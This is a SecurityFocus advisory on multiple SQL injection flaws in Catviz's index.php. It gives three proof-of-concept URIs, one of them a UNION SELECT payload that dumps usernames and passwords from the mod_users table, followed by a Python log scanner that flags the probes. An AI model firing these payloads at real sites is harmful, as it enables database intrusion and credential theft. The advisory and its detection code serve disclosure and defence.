Catviz 'index.php' Multiple SQL Injection Vulnerabilities

An attacker can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/index.php?module=news&news_op=form&form_name=article&form_action=show&foreign_key_value=10 union select 1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from mod_users/*
http://www.example.com/index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=1
http://www.example.com/index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=0
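
Added example, not part of the original advisory: a log check that flags requests whose foreign_key_value or webpage parameter is anything other than digits, which is the pattern all three URIs above share. It assumes both parameters are integer identifiers and that the web server writes Common Log Format; the log lines and function names are constructed for illustration.

```python
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory's proof-of-concept URIs inject into. Treating them
# as integer identifiers is an assumption drawn from the values 10 and 26.
NUMERIC_PARAMS = ("foreign_key_value", "webpage")

# Constructed sample access-log lines (Common Log Format, documentation IPs).
SAMPLE_LOG = [
    '192.0.2.5 - - [01/Jan/2010:10:00:00 +0000] "GET /index.php?'
    'webpages_form=webpage_multi_edit&webpage=26 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Jan/2010:10:00:05 +0000] "GET /index.php?'
    'webpages_form=webpage_multi_edit&webpage=26%20and%201=1 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Jan/2010:10:00:06 +0000] "GET /index.php?'
    'webpages_form=webpage_multi_edit&webpage=26 and%201=0 HTTP/1.1" 200 312',
    '192.0.2.7 - - [01/Jan/2010:10:00:09 +0000] "GET /index.php?module=news'
    '&form_action=show&foreign_key_value=10 HTTP/1.1" 200 2048',
]


def suspicious_params(request_target):
    """Return {name: decoded value} for monitored params that are not all digits."""
    findings = {}
    for name, value in parse_qsl(urlsplit(request_target).query):
        if name in NUMERIC_PARAMS and not (value.isascii() and value.isdigit()):
            findings[name] = value
    return findings


def scan_access_log(lines):
    """Yield (client, request_target, findings) for each flagged log line."""
    for line in lines:
        try:
            client = line.split(" ", 1)[0]
            request = line.split('"')[1]  # METHOD target HTTP/x.y
            _method, rest = request.split(" ", 1)
        except (IndexError, ValueError):
            continue  # malformed line
        # The target may contain raw spaces, so cut only the trailing version.
        target = rest.rsplit(" ", 1)[0]
        findings = suspicious_params(target)
        if findings:
            yield client, target, findings


if __name__ == "__main__":
    for client, target, findings in scan_access_log(SAMPLE_LOG):
        print(client, findings)
```

The same digits-only rule, enforced in the application before the value reaches the query, closes the issue at its source; the log check only shows who has been probing it.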


 

Copyright 2010, SecurityFocus